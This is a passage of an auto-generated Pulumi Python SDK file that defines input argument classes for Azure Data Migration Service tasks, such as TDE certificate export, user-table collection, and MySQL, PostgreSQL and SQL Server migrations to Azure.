connection_info: pulumi.Input['SqlConnectionInfoArgs'],
selected_certificates: pulumi.Input[Sequence[pulumi.Input['SelectedCertificateInputArgs']]]):
"""
Input for the task that gets TDE certificates in Base64 encoded format.
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for file share to be used for temporarily storing files.
:param pulumi.Input['SqlConnectionInfoArgs'] connection_info: Connection information for SQL Server
:param pulumi.Input[Sequence[pulumi.Input['SelectedCertificateInputArgs']]] selected_certificates: List containing certificate names and corresponding password to use for encrypting the exported certificate.
"""
pulumi.set(__self__, "backup_file_share", backup_file_share)
pulumi.set(__self__, "connection_info", connection_info)
pulumi.set(__self__, "selected_certificates", selected_certificates)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> pulumi.Input['FileShareArgs']:
"""
Backup file share information for file share to be used for temporarily storing files.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: pulumi.Input['FileShareArgs']):
pulumi.set(self, "backup_file_share", value)
@property
@pulumi.getter(name="connectionInfo")
def connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for SQL Server
"""
return pulumi.get(self, "connection_info")
@connection_info.setter
def connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "connection_info", value)
@property
@pulumi.getter(name="selectedCertificates")
def selected_certificates(self) -> pulumi.Input[Sequence[pulumi.Input['SelectedCertificateInputArgs']]]:
"""
List containing certificate names and corresponding password to use for encrypting the exported certificate.
"""
return pulumi.get(self, "selected_certificates")
@selected_certificates.setter
def selected_certificates(self, value: pulumi.Input[Sequence[pulumi.Input['SelectedCertificateInputArgs']]]):
pulumi.set(self, "selected_certificates", value)
@pulumi.input_type
class GetTdeCertificatesSqlTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['GetTdeCertificatesSqlTaskInputArgs']] = None):
"""
Properties for the task that gets TDE certificates in Base64 encoded format.
:param pulumi.Input[str] task_type: Task type.
Expected value is 'GetTDECertificates.Sql'.
:param pulumi.Input['GetTdeCertificatesSqlTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'GetTDECertificates.Sql')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'GetTDECertificates.Sql'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['GetTdeCertificatesSqlTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['GetTdeCertificatesSqlTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class GetUserTablesSqlSyncTaskInputArgs:
def __init__(__self__, *,
selected_source_databases: pulumi.Input[Sequence[pulumi.Input[str]]],
selected_target_databases: pulumi.Input[Sequence[pulumi.Input[str]]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for the task that collects user tables for the given list of databases
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_source_databases: List of source database names to collect tables for
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_target_databases: List of target database names to collect tables for
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for SQL Server
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Connection information for SQL DB
"""
pulumi.set(__self__, "selected_source_databases", selected_source_databases)
pulumi.set(__self__, "selected_target_databases", selected_target_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="selectedSourceDatabases")
def selected_source_databases(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
List of source database names to collect tables for
"""
return pulumi.get(self, "selected_source_databases")
@selected_source_databases.setter
def selected_source_databases(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "selected_source_databases", value)
@property
@pulumi.getter(name="selectedTargetDatabases")
def selected_target_databases(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
List of target database names to collect tables for
"""
return pulumi.get(self, "selected_target_databases")
@selected_target_databases.setter
def selected_target_databases(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "selected_target_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for SQL DB
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class GetUserTablesSqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['GetUserTablesSqlSyncTaskInputArgs']] = None):
"""
Properties for the task that collects user tables for the given list of databases
:param pulumi.Input[str] task_type: Task type.
Expected value is 'GetUserTables.AzureSqlDb.Sync'.
:param pulumi.Input['GetUserTablesSqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'GetUserTables.AzureSqlDb.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'GetUserTables.AzureSqlDb.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['GetUserTablesSqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['GetUserTablesSqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class GetUserTablesSqlTaskInputArgs:
def __init__(__self__, *,
connection_info: pulumi.Input['SqlConnectionInfoArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input[str]]]):
"""
Input for the task that collects user tables for the given list of databases
:param pulumi.Input['SqlConnectionInfoArgs'] connection_info: Connection information for SQL Server
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_databases: List of database names to collect tables for
"""
pulumi.set(__self__, "connection_info", connection_info)
pulumi.set(__self__, "selected_databases", selected_databases)
@property
@pulumi.getter(name="connectionInfo")
def connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for SQL Server
"""
return pulumi.get(self, "connection_info")
@connection_info.setter
def connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "connection_info", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
List of database names to collect tables for
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "selected_databases", value)
@pulumi.input_type
class GetUserTablesSqlTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['GetUserTablesSqlTaskInputArgs']] = None):
"""
Properties for the task that collects user tables for the given list of databases
:param pulumi.Input[str] task_type: Task type.
Expected value is 'GetUserTables.Sql'.
:param pulumi.Input['GetUserTablesSqlTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'GetUserTables.Sql')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'GetUserTables.Sql'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['GetUserTablesSqlTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['GetUserTablesSqlTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MiSqlConnectionInfoArgs:
def __init__(__self__, *,
managed_instance_resource_id: pulumi.Input[str],
type: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
        Properties required to create a connection to Azure SQL Database Managed Instance
        :param pulumi.Input[str] managed_instance_resource_id: Resource ID of the Azure SQL Database Managed Instance
:param pulumi.Input[str] type: Type of connection info
Expected value is 'MiSqlConnectionInfo'.
:param pulumi.Input[str] password: Password credential.
:param pulumi.Input[str] user_name: User name
"""
pulumi.set(__self__, "managed_instance_resource_id", managed_instance_resource_id)
pulumi.set(__self__, "type", 'MiSqlConnectionInfo')
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="managedInstanceResourceId")
def managed_instance_resource_id(self) -> pulumi.Input[str]:
"""
        Resource ID of the Azure SQL Database Managed Instance
"""
return pulumi.get(self, "managed_instance_resource_id")
@managed_instance_resource_id.setter
def managed_instance_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "managed_instance_resource_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of connection info
Expected value is 'MiSqlConnectionInfo'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs:
def __init__(__self__, *,
migration_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
source_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_database_name: Optional[pulumi.Input[str]] = None,
target_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
        Database-specific information for MySQL to Azure Database for MySQL migration task inputs
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] migration_setting: Migration settings which tune the migration behavior
:param pulumi.Input[str] name: Name of the database
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] source_setting: Source settings to tune source endpoint migration behavior
:param pulumi.Input[str] target_database_name: Name of target database. Note: Target database will be truncated before starting migration.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] target_setting: Target settings to tune target endpoint migration behavior
"""
if migration_setting is not None:
pulumi.set(__self__, "migration_setting", migration_setting)
if name is not None:
pulumi.set(__self__, "name", name)
if source_setting is not None:
pulumi.set(__self__, "source_setting", source_setting)
if target_database_name is not None:
pulumi.set(__self__, "target_database_name", target_database_name)
if target_setting is not None:
pulumi.set(__self__, "target_setting", target_setting)
@property
@pulumi.getter(name="migrationSetting")
def migration_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Migration settings which tune the migration behavior
"""
return pulumi.get(self, "migration_setting")
@migration_setting.setter
def migration_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "migration_setting", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="sourceSetting")
def source_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Source settings to tune source endpoint migration behavior
"""
return pulumi.get(self, "source_setting")
@source_setting.setter
def source_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "source_setting", value)
@property
@pulumi.getter(name="targetDatabaseName")
def target_database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of target database. Note: Target database will be truncated before starting migration.
"""
return pulumi.get(self, "target_database_name")
@target_database_name.setter
def target_database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_database_name", value)
@property
@pulumi.getter(name="targetSetting")
def target_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Target settings to tune target endpoint migration behavior
"""
return pulumi.get(self, "target_setting")
@target_setting.setter
def target_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "target_setting", value)
@pulumi.input_type
class MigrateMySqlAzureDbForMySqlSyncTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs']]],
source_connection_info: pulumi.Input['MySqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['MySqlConnectionInfoArgs']):
"""
Input for the task that migrates MySQL databases to Azure Database for MySQL for online migrations
:param pulumi.Input[Sequence[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['MySqlConnectionInfoArgs'] source_connection_info: Connection information for source MySQL
:param pulumi.Input['MySqlConnectionInfoArgs'] target_connection_info: Connection information for target Azure Database for MySQL
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['MySqlConnectionInfoArgs']:
"""
Connection information for source MySQL
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['MySqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MySqlConnectionInfoArgs']:
"""
Connection information for target Azure Database for MySQL
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MySqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class MigrateMySqlAzureDbForMySqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncTaskInputArgs']] = None):
"""
Properties for the task that migrates MySQL databases to Azure Database for MySQL for online migrations
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.MySql.AzureDbForMySql.Sync'.
:param pulumi.Input['MigrateMySqlAzureDbForMySqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.MySql.AzureDbForMySql.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.MySql.AzureDbForMySql.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigrateMySqlAzureDbForMySqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs:
def __init__(__self__, *,
migration_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
source_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_database_name: Optional[pulumi.Input[str]] = None,
target_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
        Database-specific information for PostgreSQL to Azure Database for PostgreSQL migration task inputs
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] migration_setting: Migration settings which tune the migration behavior
:param pulumi.Input[str] name: Name of the database
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] source_setting: Source settings to tune source endpoint migration behavior
:param pulumi.Input[str] target_database_name: Name of target database. Note: Target database will be truncated before starting migration.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] target_setting: Target settings to tune target endpoint migration behavior
"""
if migration_setting is not None:
pulumi.set(__self__, "migration_setting", migration_setting)
if name is not None:
pulumi.set(__self__, "name", name)
if source_setting is not None:
pulumi.set(__self__, "source_setting", source_setting)
if target_database_name is not None:
pulumi.set(__self__, "target_database_name", target_database_name)
if target_setting is not None:
pulumi.set(__self__, "target_setting", target_setting)
@property
@pulumi.getter(name="migrationSetting")
def migration_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Migration settings which tune the migration behavior
"""
return pulumi.get(self, "migration_setting")
@migration_setting.setter
def migration_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "migration_setting", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="sourceSetting")
def source_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Source settings to tune source endpoint migration behavior
"""
return pulumi.get(self, "source_setting")
@source_setting.setter
def source_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "source_setting", value)
@property
@pulumi.getter(name="targetDatabaseName")
def target_database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of target database. Note: Target database will be truncated before starting migration.
"""
return pulumi.get(self, "target_database_name")
@target_database_name.setter
def target_database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_database_name", value)
@property
@pulumi.getter(name="targetSetting")
def target_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Target settings to tune target endpoint migration behavior
"""
return pulumi.get(self, "target_setting")
@target_setting.setter
def target_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "target_setting", value)
@pulumi.input_type
class MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs']]],
source_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['PostgreSqlConnectionInfoArgs']):
"""
Input for the task that migrates PostgreSQL databases to Azure Database for PostgreSQL for online migrations
:param pulumi.Input[Sequence[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] source_connection_info: Connection information for source PostgreSQL
:param pulumi.Input['PostgreSqlConnectionInfoArgs'] target_connection_info: Connection information for target Azure Database for PostgreSQL
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for source PostgreSQL
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['PostgreSqlConnectionInfoArgs']:
"""
Connection information for target Azure Database for PostgreSQL
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['PostgreSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@pulumi.input_type
class MigratePostgreSqlAzureDbForPostgreSqlSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs']] = None):
"""
Properties for the task that migrates PostgreSQL databases to Azure Database for PostgreSQL for online migrations
:param pulumi.Input[str] task_type: Task type.
Expected value is 'Migrate.PostgreSql.AzureDbForPostgreSql.Sync'.
:param pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'Migrate.PostgreSql.AzureDbForPostgreSql.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'Migrate.PostgreSql.AzureDbForPostgreSql.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['MigratePostgreSqlAzureDbForPostgreSqlSyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class MigrateSqlServerSqlDbDatabaseInputArgs:
def __init__(__self__, *,
make_source_db_read_only: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
table_map: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_database_name: Optional[pulumi.Input[str]] = None):
"""
Database specific information for SQL to Azure SQL DB migration task inputs
:param pulumi.Input[bool] make_source_db_read_only: Whether to set database read only before migration
:param pulumi.Input[str] name: Name of the database
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] table_map: Mapping of source to target tables
:param pulumi.Input[str] target_database_name: Name of target database. Note: Target database will be truncated before starting migration.
"""
if make_source_db_read_only is not None:
pulumi.set(__self__, "make_source_db_read_only", make_source_db_read_only)
if name is not None:
pulumi.set(__self__, "name", name)
if table_map is not None:
pulumi.set(__self__, "table_map", table_map)
if target_database_name is not None:
pulumi.set(__self__, "target_database_name", target_database_name)
@property
@pulumi.getter(name="makeSourceDbReadOnly")
def make_source_db_read_only(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to set database read only before migration
"""
return pulumi.get(self, "make_source_db_read_only")
@make_source_db_read_only.setter
def make_source_db_read_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "make_source_db_read_only", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="tableMap")
def table_map(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Mapping of source to target tables
"""
return pulumi.get(self, "table_map")
@table_map.setter
def table_map(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "table_map", value)
@property
@pulumi.getter(name="targetDatabaseName")
def target_database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of target database. Note: Target database will be truncated before starting migration.
"""
return pulumi.get(self, "target_database_name")
@target_database_name.setter
def target_database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_database_name", value)
@pulumi.input_type
class MigrateSqlServerSqlDbSyncDatabaseInputArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
migration_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
schema_name: Optional[pulumi.Input[str]] = None,
source_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
table_map: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
target_database_name: Optional[pulumi.Input[str]] = None,
target_setting: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Database specific information for SQL to Azure SQL DB sync migration task inputs
:param pulumi.Input[str] id: Unique identifier for database
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] migration_setting: Migration settings which tune the migration behavior
:param pulumi.Input[str] name: Name of database
:param pulumi.Input[str] schema_name: Schema name to be migrated
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] source_setting: Source settings to tune source endpoint migration behavior
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] table_map: Mapping of source to target tables
:param pulumi.Input[str] target_database_name: Target database name
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] target_setting: Target settings to tune target endpoint migration behavior
"""
if id is not None:
pulumi.set(__self__, "id", id)
if migration_setting is not None:
pulumi.set(__self__, "migration_setting", migration_setting)
if name is not None:
pulumi.set(__self__, "name", name)
if schema_name is not None:
pulumi.set(__self__, "schema_name", schema_name)
if source_setting is not None:
pulumi.set(__self__, "source_setting", source_setting)
if table_map is not None:
pulumi.set(__self__, "table_map", table_map)
if target_database_name is not None:
pulumi.set(__self__, "target_database_name", target_database_name)
if target_setting is not None:
pulumi.set(__self__, "target_setting", target_setting)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Unique identifier for database
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="migrationSetting")
def migration_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Migration settings which tune the migration behavior
"""
return pulumi.get(self, "migration_setting")
@migration_setting.setter
def migration_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "migration_setting", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of database
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="schemaName")
def schema_name(self) -> Optional[pulumi.Input[str]]:
"""
Schema name to be migrated
"""
return pulumi.get(self, "schema_name")
@schema_name.setter
def schema_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema_name", value)
@property
@pulumi.getter(name="sourceSetting")
def source_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Source settings to tune source endpoint migration behavior
"""
return pulumi.get(self, "source_setting")
@source_setting.setter
def source_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "source_setting", value)
@property
@pulumi.getter(name="tableMap")
def table_map(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Mapping of source to target tables
"""
return pulumi.get(self, "table_map")
@table_map.setter
def table_map(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "table_map", value)
@property
@pulumi.getter(name="targetDatabaseName")
def target_database_name(self) -> Optional[pulumi.Input[str]]:
"""
Target database name
"""
return pulumi.get(self, "target_database_name")
@target_database_name.setter
def target_database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_database_name", value)
@property
@pulumi.getter(name="targetSetting")
def target_setting(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Target settings to tune target endpoint migration behavior
"""
return pulumi.get(self, "target_setting")
@target_setting.setter
def target_setting(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "target_setting", value)
@pulumi.input_type
class MigrateSqlServerSqlDbSyncTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
validation_options: Optional[pulumi.Input['MigrationValidationOptionsArgs']] = None):
"""
Input for the task that migrates on-prem SQL Server databases to Azure SQL Database for online migrations
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source
